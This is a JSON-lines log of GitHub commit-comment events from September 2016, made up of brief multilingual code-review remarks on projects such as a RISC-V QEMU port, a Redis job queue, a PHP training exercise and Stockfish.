{"id":"4615882453","type":"CommitCommentEvent","actor":{"login":"joakimk"},"repo":{"name":"jcelliott/toniq"},"payload":{"comment":{"id":19167803,"position":null,"line":null,"path":null,"commit_id":"b32df755896203d8ee6e930c17505e4e10950389","created_at":"2016-09-26T05:52:45Z","updated_at":"2016-09-26T05:52:45Z","body":"A timeout can work (up to a point) but a slow query will also lock up the entire redis server since it's single threaded. It would also delay resuming jobs after a restart.\r\n\r\nI think one possible solution for the scaling issues could be to only keep a limited amount of jobs in memory and avoid ever doing operations over all lists at once. The takeover could take ownership of old redis keys and then the importer could slowly import jobs from them."}},"created_at":"2016-09-26T05:52:45Z"}
{"id":"4615882505","type":"CommitCommentEvent","actor":{"login":"bkoppelmann"},"repo":{"name":"sagark/riscv-qemu-upstream"},"payload":{"comment":{"id":19167804,"position":67,"line":100,"path":"target-riscv/translate.c","commit_id":"54519eb1295d0e0509aeda1241afb91b20a9f8eb","created_at":"2016-09-26T05:52:47Z","updated_at":"2016-09-26T05:52:47Z","body":"You need to split this 'if' to another function called use_goto_tb(). See the other targets."}},"created_at":"2016-09-26T05:52:47Z"}
{"id":"4615883820","type":"CommitCommentEvent","actor":{"login":"antibland"},"repo":{"name":"smwood0906/nyTimesArticleSearch"},"payload":{"comment":{"id":19167807,"position":28,"line":32,"path":"base.html","commit_id":"d43c23d64719496ba9874f5ee198b908c03c5553","created_at":"2016-09-26T05:53:17Z","updated_at":"2016-09-26T05:53:17Z","body":"Semantically speaking, the `<h3>` seems like the wrong HTML element to use. I would use a `<p>` or even just a `<div>`."}},"created_at":"2016-09-26T05:53:17Z"}
{"id":"4615887730","type":"CommitCommentEvent","actor":{"login":"Abhishekfcb"},"repo":{"name":"Abhishekfcb/TnWebsite"},"payload":{"comment":{"id":19167813,"position":null,"line":null,"path":null,"commit_id":"9c5f30dac54c8c5803db3bb8c0c89d5f41ab18cb","created_at":"2016-09-26T05:54:55Z","updated_at":"2016-09-26T05:54:55Z","body":"the year,youtube link and the gallery parts have been changed"}},"created_at":"2016-09-26T05:54:55Z"}
{"id":"4615888022","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19167815,"position":4,"line":28,"path":"issue11-2/update-edit.php","commit_id":"78ac38f03f7e092a9b4064e8e870f7a4cdb91e70","created_at":"2016-09-26T05:55:03Z","updated_at":"2016-09-26T05:55:03Z","body":"了解しました！\r\n"}},"created_at":"2016-09-26T05:55:03Z"}
{"id":"4615888128","type":"CommitCommentEvent","actor":{"login":"antibland"},"repo":{"name":"smwood0906/nyTimesArticleSearch"},"payload":{"comment":{"id":19167816,"position":59,"line":64,"path":"scripts.js","commit_id":"d43c23d64719496ba9874f5ee198b908c03c5553","created_at":"2016-09-26T05:55:05Z","updated_at":"2016-09-26T05:55:05Z","body":"Do you need to prevent the default behavior here? Also, this won't work because you're not passing `event` into the click handler as an argument."}},"created_at":"2016-09-26T05:55:05Z"}
{"id":"4615890161","type":"CommitCommentEvent","actor":{"login":"antibland"},"repo":{"name":"smwood0906/nyTimesArticleSearch"},"payload":{"comment":{"id":19167821,"position":66,"line":71,"path":"scripts.js","commit_id":"d43c23d64719496ba9874f5ee198b908c03c5553","created_at":"2016-09-26T05:55:55Z","updated_at":"2016-09-26T05:55:55Z","body":"Again, not sure you'd need to prevent default here."}},"created_at":"2016-09-26T05:55:55Z"}
{"id":"4615894947","type":"CommitCommentEvent","actor":{"login":"sabdo4959"},"repo":{"name":"sabdo4959/SmartShoppingSolution"},"payload":{"comment":{"id":19167828,"position":null,"line":null,"path":null,"commit_id":"068db48abf279bcb5a5c5a6fc4e6904824807a5a","created_at":"2016-09-26T05:57:55Z","updated_at":"2016-09-26T05:57:55Z","body":"test"}},"created_at":"2016-09-26T05:57:55Z"}
{"id":"4615895450","type":"CommitCommentEvent","actor":{"login":"antibland"},"repo":{"name":"smwood0906/nyTimesArticleSearch"},"payload":{"comment":{"id":19167830,"position":68,"line":73,"path":"scripts.js","commit_id":"d43c23d64719496ba9874f5ee198b908c03c5553","created_at":"2016-09-26T05:58:07Z","updated_at":"2016-09-26T05:58:07Z","body":"If you notice duplicate lookups, such as the one for `search-key`, consider caching the result, such as:\r\n\r\n`var search_key = $(\"#search-key\");`"}},"created_at":"2016-09-26T05:58:07Z"}
{"id":"4615895462","type":"CommitCommentEvent","actor":{"login":"vitaly-zdanevich"},"repo":{"name":"jeffkowalski/geeknote"},"payload":{"comment":{"id":19167831,"position":null,"line":null,"path":null,"commit_id":"f0ff054aa5c9c1416cf7594298e896c467b0b010","created_at":"2016-09-26T05:58:07Z","updated_at":"2016-09-26T05:58:07Z","body":"Thank you!"}},"created_at":"2016-09-26T05:58:07Z"}
{"id":"4615895771","type":"CommitCommentEvent","actor":{"login":"RosadinTV"},"repo":{"name":"RosadinTV/RosadinTV.github.io"},"payload":{"comment":{"id":19167832,"position":null,"line":null,"path":null,"commit_id":"805b30033ebe5b963f257882ab0e0b30a6eb73d3","created_at":"2016-09-26T05:58:14Z","updated_at":"2016-09-26T05:58:14Z","body":"Soy el desarrollador del proyecto original 😉 "}},"created_at":"2016-09-26T05:58:14Z"}
{"id":"4615898346","type":"CommitCommentEvent","actor":{"login":"dupuy"},"repo":{"name":"dupuy/targetedthreats"},"payload":{"comment":{"id":19167836,"position":null,"line":null,"path":null,"commit_id":"367d3710b95e352cae0b667ded5f47f742995138","created_at":"2016-09-26T05:59:20Z","updated_at":"2016-09-26T05:59:20Z","body":"This wasn't necessary, problem was on line 48 (one beyond where reported)."}},"created_at":"2016-09-26T05:59:20Z"}
{"id":"4615898351","type":"CommitCommentEvent","actor":{"login":"cengfengcode"},"repo":{"name":"cengfengcode/App_Code_IOS"},"payload":{"comment":{"id":19167837,"position":null,"line":null,"path":null,"commit_id":"d75d2e7c7a4075cf837fe332e754b06a68d5860d","created_at":"2016-09-26T05:59:20Z","updated_at":"2016-09-26T05:59:20Z","body":"APPIOS端程序"}},"created_at":"2016-09-26T05:59:20Z"}
{"id":"4615898640","type":"CommitCommentEvent","actor":{"login":"antibland"},"repo":{"name":"smwood0906/nyTimesArticleSearch"},"payload":{"comment":{"id":19167838,"position":5,"line":21,"path":"styles.css","commit_id":"d43c23d64719496ba9874f5ee198b908c03c5553","created_at":"2016-09-26T05:59:28Z","updated_at":"2016-09-26T05:59:28Z","body":"As a CSS vet, this looks a bit odd. I think you should stick with `em` of `px` for your margins and padding. Preferably, `em`."}},"created_at":"2016-09-26T05:59:28Z"}
{"id":"4615899213","type":"CommitCommentEvent","actor":{"login":"jugglnaut"},"repo":{"name":"jugglnaut/git_test"},"payload":{"comment":{"id":19167841,"position":5,"line":6,"path":"test.txt","commit_id":"463c26c5f28af40f73ef97fbbe98ccae21df76ae","created_at":"2016-09-26T05:59:42Z","updated_at":"2016-09-26T05:59:42Z","body":"hello not there"}},"created_at":"2016-09-26T05:59:42Z"}
{"id":"4615900078","type":"CommitCommentEvent","actor":{"login":"sabdo4959"},"repo":{"name":"sabdo4959/SmartShoppingSolution"},"payload":{"comment":{"id":19167843,"position":7,"line":7,"path":"SSS/src/com/example/sss/MainActivity.java","commit_id":"068db48abf279bcb5a5c5a6fc4e6904824807a5a","created_at":"2016-09-26T06:00:03Z","updated_at":"2016-09-26T06:00:03Z","body":"@sabdo4959 hey! it is your fault"}},"created_at":"2016-09-26T06:00:03Z"}
{"id":"4615903396","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19167875,"position":44,"line":41,"path":"issue18/login.php","commit_id":"df1870cffc8c2485d010c23815a4261ceb1ceab1","created_at":"2016-09-26T06:01:14Z","updated_at":"2016-09-26T06:01:14Z","body":"動き確認しましたがすばらしいですね！\r\nあとは細かい点をコメントいたしますので、しばしお待ちを。"}},"created_at":"2016-09-26T06:01:14Z"}
{"id":"4615903763","type":"CommitCommentEvent","actor":{"login":"antibland"},"repo":{"name":"smwood0906/nyTimesArticleSearch"},"payload":{"comment":{"id":19167878,"position":38,"line":42,"path":"scripts.js","commit_id":"d43c23d64719496ba9874f5ee198b908c03c5553","created_at":"2016-09-26T06:01:24Z","updated_at":"2016-09-26T06:01:24Z","body":"Minor performance improvement. Instead of iterating through `results.length`, cache the length of results outside of the loop. This creates less work for your program to have to do."}},"created_at":"2016-09-26T06:01:24Z"}
{"id":"4615905475","type":"CommitCommentEvent","actor":{"login":"EricYangLove"},"repo":{"name":"EricYangLove/testgit"},"payload":{"comment":{"id":19167889,"position":6,"line":6,"path":"readme.txt","commit_id":"6aa5c35684c0d16c1809926a66b6b7a1d1edadc7","created_at":"2016-09-26T06:02:07Z","updated_at":"2016-09-26T06:02:07Z","body":"这是我的最后更改"}},"created_at":"2016-09-26T06:02:07Z"}
{"id":"4615906019","type":"CommitCommentEvent","actor":{"login":"kopax"},"repo":{"name":"spring-guides/tut-react-and-spring-data-rest"},"payload":{"comment":{"id":19167890,"position":null,"line":null,"path":null,"commit_id":"10b5db5d70bb6bd3a80cf5001b1c5b17f670bd43","created_at":"2016-09-26T06:02:19Z","updated_at":"2016-09-26T06:02:19Z","body":"app.js:262 Uncaught TypeError: React.findDOMNode is not a function\r\n\r\nWhen trying to update an entry using the project /workspace/github.com/spring-guides/tut-react-and-spring-data-rest/events "}},"created_at":"2016-09-26T06:02:19Z"}
{"id":"4615906022","type":"CommitCommentEvent","actor":{"login":"EricYangLove"},"repo":{"name":"EricYangLove/testgit"},"payload":{"comment":{"id":19167891,"position":2,"line":4,"path":"readme.txt","commit_id":"6aa5c35684c0d16c1809926a66b6b7a1d1edadc7","created_at":"2016-09-26T06:02:19Z","updated_at":"2016-09-26T06:02:19Z","body":"你好啊"}},"created_at":"2016-09-26T06:02:19Z"}
{"id":"4615907704","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19167895,"position":16,"line":20,"path":"issue11-2/update-delete.php","commit_id":"98653b5f4240ada32931bc738e2d440f2151dfa5","created_at":"2016-09-26T06:02:59Z","updated_at":"2016-09-26T06:02:59Z","body":"下記のように書き換えました！    \r\n\r\n// DELETE文を実行\r\n\r\n    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);\r\n\r\n    $stmt = $pdo -> prepare(\"DELETE FROM topics WHERE id=:id\");\r\n\r\n    // パラメータに文字列としてバインド（文字列以外入力できなくする）\r\n    $stmt->bindParam(':id', $id, PDO::PARAM_INT);\r\n\r\n    $stmt ->execute();"}},"created_at":"2016-09-26T06:02:59Z"}
{"id":"4615908215","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19167897,"position":null,"line":null,"path":null,"commit_id":"536ef569e883f9a0eb54df4702a64ccedca2fcce","created_at":"2016-09-26T06:03:11Z","updated_at":"2016-09-26T06:03:11Z","body":"In fact a better description would be \"*protected by a knight or a pawn*\", because the effect of this patch on reachable outposts (the piece has not yet landed on the outpost) is the following:\r\n\r\na) bishop, outpost square protected by pawn: bigger bonus\r\nb) bishop, outpost square protected by knight: **bigger bonus**\r\nc) bishop, outpost square protected by 2 bishops (very rare): **bigger bonus for the second bishop**\r\nd) knight, outpost square protected by pawn: bigger bonus\r\ne) knight, outpost square protected by 2 knights (not rare) : **bigger bonus for the second knight**\r\nf) knight, outpost square protected by bishop: nothing (but see b, the bishop will get a bonus)\r\n\r\nSo despite the use during the piece loop of the partially initialized ei.attackedBy2[] array, it's coherent: if a reachable outpost is reachable by n minors, n-1 of them will get a bigger bonus. Most common case will be n=2."}},"created_at":"2016-09-26T06:03:11Z"}
{"id":"4615909239","type":"CommitCommentEvent","actor":{"login":"joakimk"},"repo":{"name":"safwank/toniq"},"payload":{"comment":{"id":19167898,"position":null,"line":null,"path":null,"commit_id":"3f12381ad5766ab9dcc5af3198ac7cf4f37937fe","created_at":"2016-09-26T06:03:37Z","updated_at":"2016-09-26T06:03:37Z","body":"Could you persist the external data in a separate redis list (or in memory if it can be reproduced) and then enqueue jobs based on the internal source that process both data sets at once?"}},"created_at":"2016-09-26T06:03:37Z"}
{"id":"4615909357","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19167899,"position":16,"line":20,"path":"issue11-2/update-delete.php","commit_id":"98653b5f4240ada32931bc738e2d440f2151dfa5","created_at":"2016-09-26T06:03:39Z","updated_at":"2016-09-26T06:03:39Z","body":"『:id』の形で記載した時必ずバインドもする必要があるのでしょうか？"}},"created_at":"2016-09-26T06:03:39Z"}
{"id":"4615910954","type":"CommitCommentEvent","actor":{"login":"bkoppelmann"},"repo":{"name":"sagark/riscv-qemu-upstream"},"payload":{"comment":{"id":19167903,"position":23,"line":129,"path":"target-riscv/translate.c","commit_id":"79b79e1fc03afa563abe8d1b0ed41c05224c4a0f","created_at":"2016-09-26T06:04:16Z","updated_at":"2016-09-26T06:04:16Z","body":"Why not add a makro for rs1, rs2 and rd to instmap.h? I'm not really a fan of magic numbers..."}},"created_at":"2016-09-26T06:04:16Z"}
{"id":"4615912821","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19167906,"position":10,"line":27,"path":"issue18/login.sql","commit_id":"a3b651d5bb78a74ff1caff1a96cc046f7cbd8c7d","created_at":"2016-09-26T06:04:58Z","updated_at":"2016-09-26T06:04:58Z","body":"name カラムは認証に使っているカラムで一意である必要があるので、ユニーク制約をかけないといけませんね。\r\n\r\n修正&「一意である必要がある」の理由も書いていただけると嬉しいです。"}},"created_at":"2016-09-26T06:04:58Z"}
{"id":"4615914073","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19167907,"position":39,"line":39,"path":"issue11-2/regist.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-26T06:05:30Z","updated_at":"2016-09-26T06:05:30Z","body":"了解です。SQLインジェクション対策をする、という場合には基本的にSQL分の変数の箇所を『:name』の形で記載する、という理解で宜しいでしょうか。"}},"created_at":"2016-09-26T06:05:30Z"}
{"id":"4615915325","type":"CommitCommentEvent","actor":{"login":"bkoppelmann"},"repo":{"name":"sagark/riscv-qemu-upstream"},"payload":{"comment":{"id":19167910,"position":39,"line":145,"path":"target-riscv/translate.c","commit_id":"79b79e1fc03afa563abe8d1b0ed41c05224c4a0f","created_at":"2016-09-26T06:05:58Z","updated_at":"2016-09-26T06:05:58Z","body":"Where do you free this temporary? "}},"created_at":"2016-09-26T06:05:58Z"}
{"id":"4615916207","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19167911,"position":25,"line":26,"path":"issue18/login.php","commit_id":"144bedb9cd4bae0815a222fc2f8a9e3b0558d397","created_at":"2016-09-26T06:06:18Z","updated_at":"2016-09-26T06:06:18Z","body":"ここはSQLインジェクション対策が必要です。"}},"created_at":"2016-09-26T06:06:18Z"}
{"id":"4615916443","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19167912,"position":5,"line":5,"path":"issue11-2/update-delete.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-26T06:06:24Z","updated_at":"2016-09-26T06:06:24Z","body":"いえ、こちらはあまり理解せず、『コピペしたら動いたのでOK』という認識で進めてしまっていました。一度調べてみたいと思います。"}},"created_at":"2016-09-26T06:06:24Z"}
{"id":"4615917745","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19167914,"position":30,"line":28,"path":"issue18/login.php","commit_id":"144bedb9cd4bae0815a222fc2f8a9e3b0558d397","created_at":"2016-09-26T06:06:53Z","updated_at":"2016-09-26T06:06:53Z","body":"もし`name`が一意でないとどうなるのかに注目です。"}},"created_at":"2016-09-26T06:06:53Z"}
{"id":"4615917752","type":"CommitCommentEvent","actor":{"login":"rahulpandeygwl"},"repo":{"name":"rahulpandeygwl/new_ems_db"},"payload":{"comment":{"id":19167915,"position":null,"line":null,"path":null,"commit_id":"06b845e06131d9c33c2fa35b2003add450899acb","created_at":"2016-09-26T06:06:53Z","updated_at":"2016-09-26T06:06:53Z","body":"MYP-1"}},"created_at":"2016-09-26T06:06:53Z"}
{"id":"4615918570","type":"CommitCommentEvent","actor":{"login":"tackin"},"repo":{"name":"freifunktrier/Supernodes"},"payload":{"comment":{"id":19167916,"position":null,"line":null,"path":null,"commit_id":"da2db2f79f87f7ec402c2942ee258dd8b1d06d05","created_at":"2016-09-26T06:07:12Z","updated_at":"2016-09-26T06:07:12Z","body":"Sicher? Du willst doch abfangen net.len < 64 ."}},"created_at":"2016-09-26T06:07:12Z"}
{"id":"4615919712","type":"CommitCommentEvent","actor":{"login":"bkoppelmann"},"repo":{"name":"sagark/riscv-qemu-upstream"},"payload":{"comment":{"id":19167918,"position":53,"line":159,"path":"target-riscv/translate.c","commit_id":"79b79e1fc03afa563abe8d1b0ed41c05224c4a0f","created_at":"2016-09-26T06:07:41Z","updated_at":"2016-09-26T06:07:41Z","body":"Why the extra effort? Just use tcg_gen_movi_tl(cpu_gpr[rd], ctx->pc + 4);"}},"created_at":"2016-09-26T06:07:41Z"}
{"id":"4615920451","type":"CommitCommentEvent","actor":{"login":"EricYangLove"},"repo":{"name":"EricYangLove/testgit"},"payload":{"comment":{"id":19167921,"position":null,"line":null,"path":null,"commit_id":"6aa5c35684c0d16c1809926a66b6b7a1d1edadc7","created_at":"2016-09-26T06:07:59Z","updated_at":"2016-09-26T06:07:59Z","body":"我是特种兵"}},"created_at":"2016-09-26T06:07:59Z"}
{"id":"4615925896","type":"CommitCommentEvent","actor":{"login":"bkoppelmann"},"repo":{"name":"sagark/riscv-qemu-upstream"},"payload":{"comment":{"id":19167929,"position":57,"line":163,"path":"target-riscv/translate.c","commit_id":"79b79e1fc03afa563abe8d1b0ed41c05224c4a0f","created_at":"2016-09-26T06:10:08Z","updated_at":"2016-09-26T06:10:08Z","body":"use nextpc here."}},"created_at":"2016-09-26T06:10:08Z"}
{"id":"4615928697","type":"CommitCommentEvent","actor":{"login":"josefspr"},"repo":{"name":"daat-hamakom/maps"},"payload":{"comment":{"id":19167933,"position":null,"line":null,"path":null,"commit_id":"c178e732286c42f1537633a5125dfc0e2e66ad9c","created_at":"2016-09-26T06:11:12Z","updated_at":"2016-09-26T06:11:12Z","body":"looks very nice (:"}},"created_at":"2016-09-26T06:11:12Z"}
{"id":"4615932422","type":"CommitCommentEvent","actor":{"login":"Aericio"},"repo":{"name":"robske110/CSphar"},"payload":{"comment":{"id":19167938,"position":null,"line":null,"path":null,"commit_id":"af5a6cdcb1ac4aa86d879079ff48a63cc3508f81","created_at":"2016-09-26T06:12:40Z","updated_at":"2016-09-26T06:12:40Z","body":"Is there a csphar.php?"}},"created_at":"2016-09-26T06:12:40Z"}
{"id":"4615937556","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19167943,"position":41,"line":35,"path":"issue18/login.php","commit_id":"144bedb9cd4bae0815a222fc2f8a9e3b0558d397","created_at":"2016-09-26T06:14:39Z","updated_at":"2016-09-26T06:14:39Z","body":"下の `echo パスワードが正しくありません。;` のようなログイン失敗時のメッセージは一般的に`パスワードか名前が正しくありません。` とするとセキュリティ的に良いかと思います(今回の実装ですと、名前が違っている場合もあるのでユーザーフレンドリーという面もありますね)。\r\n\r\nセキュリティ的な問題は「パスワードが正しくありません。」ですと、ユーザー名は存在することがバレてしまうということになります。"}},"created_at":"2016-09-26T06:14:39Z"}
{"id":"4615939260","type":"CommitCommentEvent","actor":{"login":"mrmachine"},"repo":{"name":"ic-labs/django-icekit"},"payload":{"comment":{"id":19167945,"position":16,"line":74,"path":"icekit/templates/icekit/base.html","commit_id":"df79fb56b7b71a6a1e2e2c8729811de741764ea3","created_at":"2016-09-26T06:15:17Z","updated_at":"2016-09-26T06:15:17Z","body":"@jmurty I think this needs to move out of the compress block. Haven't noticed it causing any trouble just yet, but any dynamic JS in a compress block will break offline compression unless we populate the offline context with all possible values beforehand."}},"created_at":"2016-09-26T06:15:17Z"}
{"id":"4615940965","type":"CommitCommentEvent","actor":{"login":"mvvmsameer"},"repo":{"name":"mvvmsameer/sample1"},"payload":{"comment":{"id":19167947,"position":null,"line":null,"path":null,"commit_id":"b49dd0bc6a1220c68cb60f598a60fe3e14dc3690","created_at":"2016-09-26T06:15:57Z","updated_at":"2016-09-26T06:15:57Z","body":"this is maepalli vijay venkata mani sameer"}},"created_at":"2016-09-26T06:15:57Z"}
{"id":"4615940989","type":"CommitCommentEvent","actor":{"login":"ChecheSwap"},"repo":{"name":"ChecheSwap/Arduino_Library_pushButton_LinkedList"},"payload":{"comment":{"id":19167948,"position":null,"line":null,"path":null,"commit_id":"ca97631667948c917d078c102ea67b1459347719","created_at":"2016-09-26T06:15:58Z","updated_at":"2016-09-26T06:15:58Z","body":"Examples Auto"}},"created_at":"2016-09-26T06:15:58Z"}
{"id":"4615946442","type":"CommitCommentEvent","actor":{"login":"wangding"},"repo":{"name":"wangding/pylearn"},"payload":{"comment":{"id":19167957,"position":10,"line":10,"path":"assignment/triangle/06.py","commit_id":"19afc350ae99994834d310586562d121fc5554d2","created_at":"2016-09-26T06:18:04Z","updated_at":"2016-09-26T06:18:04Z","body":"可以给参数默认值。maxLevel = 4"}},"created_at":"2016-09-26T06:18:04Z"}
{"id":"4615946945","type":"CommitCommentEvent","actor":{"login":"birtles"},"repo":{"name":"servo/servo"},"payload":{"comment":{"id":19167960,"position":99,"line":397,"path":"components/style/properties/properties.mako.rs","commit_id":"51e642e875ea25502b92967358e32a30e06ab3dd","created_at":"2016-09-26T06:18:16Z","updated_at":"2016-09-26T06:18:16Z","body":"Hi @craftytrickster! I'm just wondering what the reasoning is for this check here. Over in Gecko we're trying to use this code but it seems that when we serialize declarations with var references we end up with \"left:var(--hello)\" instead of \"left: var(--hello)\" as might otherwise be expected. (see [Bugzilla bug](https://bugzilla.mozilla.org/show_bug.cgi?id=1302949#c15))\r\n\r\n(Also, sorry for messaging you here--I couldn't find any other way to contact you.)"}},"created_at":"2016-09-26T06:18:16Z"}
{"id":"4615947896","type":"CommitCommentEvent","actor":{"login":"xieguigang"},"repo":{"name":"xieguigang/VisualBasic_AppFramework"},"payload":{"comment":{"id":19167962,"position":18,"line":37,"path":"gr/Microsoft.VisualBasic.Imaging/SVG/SVG.vb","commit_id":"4c69030cb6274899c99aff4f5f603b6430e2d96d","created_at":"2016-09-26T06:18:40Z","updated_at":"2016-09-26T06:18:40Z","body":"This shadows property will cause the xml serialization failure!"}},"created_at":"2016-09-26T06:18:40Z"}
{"id":"4615950038","type":"CommitCommentEvent","actor":{"login":"zstadler"},"repo":{"name":"IsraelHikingMap/Site"},"payload":{"comment":{"id":19167967,"position":233,"line":1067,"path":"IsrealHiking.Web/controllers/InfoController.ts","commit_id":"f4f87ff76f1b6249992be477664c9ed09d81cd01","created_at":"2016-09-26T06:19:25Z","updated_at":"2016-09-26T06:19:25Z","body":"I don't understand the logic behind this else clause. If my understanding is correct, a ALL other maps will show only the common items for both IHM and ILMTB.\r\n\r\nThe idea behind using a \"remove per-map\" annotation is that everything on the legend is available by default for the next map we add.\r\n\r\nFor Google Earth and all user-defined base layers, the legend should be empty.\r\n\r\nIMO the following **pseudo-code** should replace this else clause:\r\n```\r\n} else if (this.layersService.selectedBaseLayer.key === Services.Layers.LayersService.GOOGLE_EARTH) {\r\n  this.removeLegend;\r\n} else if (this.layersService.selectedBaseLayer.type === Services.Layers.LayersService.USER_DEFINED{\r\n  this.removeLegend;\r\n}"}},"created_at":"2016-09-26T06:19:25Z"}
{"id":"4615950694","type":"CommitCommentEvent","actor":{"login":"wangding"},"repo":{"name":"wangding/pylearn"},"payload":{"comment":{"id":19167969,"position":27,"line":27,"path":"assignment/triangle/06.py","commit_id":"19afc350ae99994834d310586562d121fc5554d2","created_at":"2016-09-26T06:19:40Z","updated_at":"2016-09-26T06:19:40Z","body":"这个int类型转化函数的调用与21行重复了。"}},"created_at":"2016-09-26T06:19:40Z"}
{"id":"4615952236","type":"CommitCommentEvent","actor":{"login":"efiring"},"repo":{"name":"powellb/seapy"},"payload":{"comment":{"id":19167975,"position":51,"line":664,"path":"lib.py","commit_id":"b2b7cdd1fba026372d028b3349f33a239d51e0c0","created_at":"2016-09-26T06:20:12Z","updated_at":"2016-09-26T06:20:12Z","body":"On 2016/09/25 7:25 PM, Brian Powell wrote:\n> I see what you are saying. The default case should be exact (e.g.,\n> tolerance = 0). There are two complications that have come up with my\n> testing:\n\nNo, that is not what I am suggesting!  Quite the opposite--I am \nsuggesting that the default case should be what I made it originally, \nand that an input of 0 should not be interpreted as equivalent to an \nunspecified tolerance (None -> default).\n\n>\n> 1. if the user uses a scalar as one of the arrays (the np.diff returns\n> an empty array)\n\nIf you want to guard against this user error, then it should be trapped \nas early as possible.\n\n> 2. if the user doesn't provide an array of numbers (for instance, the\n> user provides arrays of datetimes).\n\nI wasn't thinking about this--I really don't like arrays of datetimes, \nand it never occurred to me.  If you want to support this, the way to do \nit might be to detect it and then convert to numpy datetime64, after \nwhich I think everything else might work pretty much as-is.  I would \nneed to look at that more carefully.  I don't have much experience with \ndatetime64.\n\n\n\n"}},"created_at":"2016-09-26T06:20:12Z"}
{"id":"4615954424","type":"CommitCommentEvent","actor":{"login":"wangding"},"repo":{"name":"wangding/pylearn"},"payload":{"comment":{"id":19167983,"position":30,"line":30,"path":"assignment/triangle/06.py","commit_id":"19afc350ae99994834d310586562d121fc5554d2","created_at":"2016-09-26T06:20:56Z","updated_at":"2016-09-26T06:20:56Z","body":"如果带上默认值参数，则这个输入参数4就可以省略了。"}},"created_at":"2016-09-26T06:20:56Z"}
{"id":"4615954577","type":"CommitCommentEvent","actor":{"login":"davidromani"},"repo":{"name":"Flexible-User-Experience/fibervent"},"payload":{"comment":{"id":19167984,"position":null,"line":null,"path":null,"commit_id":"68196444467738f91ac9a5fc9ab1ffff4f80cfc6","created_at":"2016-09-26T06:20:58Z","updated_at":"2016-09-26T06:20:58Z","body":"I prefere this kind of pattern because is more human friendly: \"Y-m-d-H-i\"\r\n\r\nTry to deliver things for humans, not for machines ;-)"}},"created_at":"2016-09-26T06:20:58Z"}
{"id":"4615958565","type":"CommitCommentEvent","actor":{"login":"attuska"},"repo":{"name":"uhulinux/ub-ubk1"},"payload":{"comment":{"id":19167994,"position":null,"line":null,"path":null,"commit_id":"8a3ff5bb02f4fdb2a86121d111874ba4b49cbe86","created_at":"2016-09-26T06:22:33Z","updated_at":"2016-09-26T06:22:33Z","body":"A qterminal angol lett, eltűnt a szép fordításom.\r\n"}},"created_at":"2016-09-26T06:22:33Z"}
{"id":"4615961087","type":"CommitCommentEvent","actor":{"login":"maniac23"},"repo":{"name":"maniac23/imaguru"},"payload":{"comment":{"id":19167999,"position":78,"line":78,"path":"src/style/partials/icons-list.scss","commit_id":"1bae332888f72590fb18f31512f284cb15a205ed","created_at":"2016-09-26T06:23:30Z","updated_at":"2016-09-26T06:23:30Z","body":"@SiarheiD добавляй нули перед десятичными числами, пожалуйста"}},"created_at":"2016-09-26T06:23:30Z"}
{"id":"4615962790","type":"CommitCommentEvent","actor":{"login":"shanhaichik"},"repo":{"name":"nihirash/nihirash.github.io"},"payload":{"comment":{"id":19168004,"position":1,"line":1,"path":"index.html","commit_id":"8f93b923c796de5322ad3466f3faa450101a5a9e","created_at":"2016-09-26T06:24:07Z","updated_at":"2016-09-26T06:24:07Z","body":"World!:)"}},"created_at":"2016-09-26T06:24:07Z"}
{"id":"4615963961","type":"CommitCommentEvent","actor":{"login":"ala008"},"repo":{"name":"ala008/test"},"payload":{"comment":{"id":19168007,"position":null,"line":null,"path":null,"commit_id":"25d508f5c379991872511966875fd5cb99342724","created_at":"2016-09-26T06:24:30Z","updated_at":"2016-09-26T06:24:30Z","body":"OK"}},"created_at":"2016-09-26T06:24:30Z"}
{"id":"4615966956","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"clman94/Wolf-Gang-Engine"},"payload":{"comment":{"id":19168013,"position":null,"line":null,"path":null,"commit_id":"238fa7115107e593fc94cc793f4a5e94888ac6af","created_at":"2016-09-26T06:25:32Z","updated_at":"2016-09-26T06:25:32Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [click and drag only works in 2 directions in collision editor (right and down)](https://trello.com/c/ItrLQuni/97-click-and-drag-only-works-in-2-directions-in-collision-editor-right-and-down)"}},"created_at":"2016-09-26T06:25:32Z"}
{"id":"4615969311","type":"CommitCommentEvent","actor":{"login":"maniac23"},"repo":{"name":"maniac23/imaguru"},"payload":{"comment":{"id":19168018,"position":47,"line":47,"path":"src/style/partials/icons-list.scss","commit_id":"1bae332888f72590fb18f31512f284cb15a205ed","created_at":"2016-09-26T06:26:19Z","updated_at":"2016-09-26T06:26:19Z","body":"@SiarheiD и раз уж мы (я) начали делать проект desktop first, то давай придерживаться этого. переделай плиз медиа выражения"}},"created_at":"2016-09-26T06:26:19Z"}
